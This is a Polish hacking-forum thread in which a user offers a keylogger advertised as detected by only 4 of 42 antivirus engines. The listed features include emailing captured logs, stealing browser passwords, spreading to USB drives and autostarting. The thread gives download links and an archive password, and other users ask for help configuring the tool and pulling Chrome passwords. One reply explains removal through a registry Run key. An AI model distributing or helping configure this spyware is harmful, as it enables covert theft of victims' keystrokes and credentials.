Keylogger z wykrywalnoscia 4/42

[Do4Got]

Witam.
Mam keyloggera z wykrywalnoscia 4/42.
Zostal on zrobiony przeze mnie.

Funkcje:
- Zmiana ikony
- Wysylanie logow na email
- Zwiekszanie wagi pliku
- Infekowanie dyskow USB
- Kradniecie hasel z przegladarki
- Autostart, czyli automatyczne włączanie po resecie komputera

Czas między wysyłaniem logów można zmieniać.

Funkcje można wyłączać/włączać wg. własnego uznania

Zrzut ekranu konfiguratora:

Download:
http://fileme.us/file/03J6675

 

[ziomball]

Mógłbyś wrzucić to na inny serwer?

 

[hxv]

Jeśli faktycznie jesteś autorem programu, to czemu tak kombinujesz ze śmiesznym linkiem do pobrania? Na Hack Forums podane są normalne linki: klik + hasło.

 

[HeadShotDeluxe]

Podejrzałem kod tego keyloggera programem DisSharp i TU znalazłem prawie identyczny. Więc jak kogoś to interesuje to sam sobie może napisać/przepisać.

A co do tego tutaj to nie wiem czemu po uruchomieniu serwera wyświetla się on na pasku zadań:

Używam WinXP(32bit) + SP3 + aktualizacje + NET Framework 2

EDIT:
Ja ściągnąłem keyloggera ze źródła które podał hxv, bo z tym pierwszym to nie chce mi się bawić, ale to ten sam keylogger!

 

[CarpeDiem1234]

Prosze o sprawdzenie tego!!!!
Czy on tam nie wsadził keyloggera plis plis plis!

 

[trojanxem]

Grassy KNoll keylogger >> google

 

[D.F.]

Prosze o sprawdzenie tego!!!!
Czy on tam nie wsadził keyloggera plis plis plis!

Keylogger jest napisany w .NET dlatego przy dekompilacji otrzymujemy bardzo ładny kod
Program można bezpiecznie używać, sam go uruchamiałem u siebie.

 

[Darchior]

Czy można podać email np z wp.pl ? czy musi być gmail ?

 

[Do4Got]

Czy można podać email np z wp.pl ? czy musi być gmail ?

Musi być Gmail.

 

[makankosapo]

Jeśli chodzi o "Send Logs To" to można już wpisać jakiegoś swojego maila na wp chociażby?

 

[piotrpwi]

as

Bedzie opcja zeby pobieral hasla z google chrome?

 

[HeadShotDeluxe]

Bedzie opcja zeby pobieral hasla z google chrome?

Tam jest taka opcja. Trzeba zaznaczyć "PW Stealer".

 

[dima0909x]

jak go pobrać?

 

[HeadShotDeluxe]

jak go pobrać?

Tylko nie wywalaj pliku "Stub.exe", to nie jest wirus. Plik ten jest potrzebny do prawidłowego generowania serwera.

http://rapidshare.com/files/4211618212/Grassy Knoll Keylogger by Aaaaaaa.rar
Hasło archiwum:majster

 

[Skrapi]

Jak można go później usunąć?

 

[HeadShotDeluxe]

Jak można go później usunąć?

Start --> Uruchom i wpisujesz: regedit. Przechodzisz do klucza HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run i usuwasz wpis o nazwie hijack.
EDIT:
Zauważyliście że serwer tego keylogera nigdzie się nie kopiuje? A może ja czegoś nie dopatrzyłem?

 

[makankosapo]

Dodam od siebie, że Anti-Malware namierza tego keyloggera, gdy nawet nic nie zostało wcześniej zbudowane . Z tego co widzę to jednak coś zostaje w rejestrze.

 

[makankosapo]

Mam pytanie. Czy ten keylogger działa tylko w oparciu o Mozillę? Musiałem wcześniej sam odinstalować Firefoxa. Wówczas sprawdziłem z ciekawości czy aby na pewno ów twór będzie działał. Wyskoczył komunikat "... library Firefox" (dokładnie treści nie pamiętam, ale było wcześniej o tym, że coś nie poszło). Inna sprawa jest taka, że szukałem przez "Wyszukaj" plików o rozszerzeniu ico, żeby była mowa o ikonie. Nie wiem gdzie tkwi błąd.

 

[kiełbasa]

Sprawdzalem u siebie tego keyloggera, ale mimo Frameworka 4.0 nic nie dochodzilo ani na gmaila ani na wp. W rejestrze systemu nie ma wirusa w ogole, a jedynie co to do tych przegladarek "podpina sie" w celu wykradania zapisywanych hasel. Zupelnie nie wiem o co chodzi.

 

[makankosapo]

Ktoś z was miał do czynienia ostatnio z tym keyloggerem? U mnie to dosłownie nic się nie instaluje jak kliknę na tego powstałego hijacka nawet PW Stealer. To dlatego, że nie mam starszej wersji Frameworka czyli 2.0?